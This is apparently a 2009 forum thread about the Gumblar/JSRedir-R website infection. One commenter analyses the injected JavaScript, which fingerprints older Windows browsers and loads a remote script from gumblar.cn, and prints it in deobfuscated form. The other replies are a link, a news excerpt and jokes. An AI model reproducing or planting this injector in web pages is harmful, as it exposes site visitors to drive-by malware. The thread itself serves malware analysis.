Another good writeup here
Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
It seems to be cropping up all over the place with no obvious infection vector.
A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …
I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.
function(){
var versionString = "";
if( (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) && (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ) {
zrvzts="A";
if(window.ScriptEngine) {
versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
}
document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );
} }
"The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."
NO JUST NO
It took me a month to get that image out of my head and here you go putting it back there.
I guess im just going to do like Sam Neil in Event Horizon
http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg
/Good bye to my eyes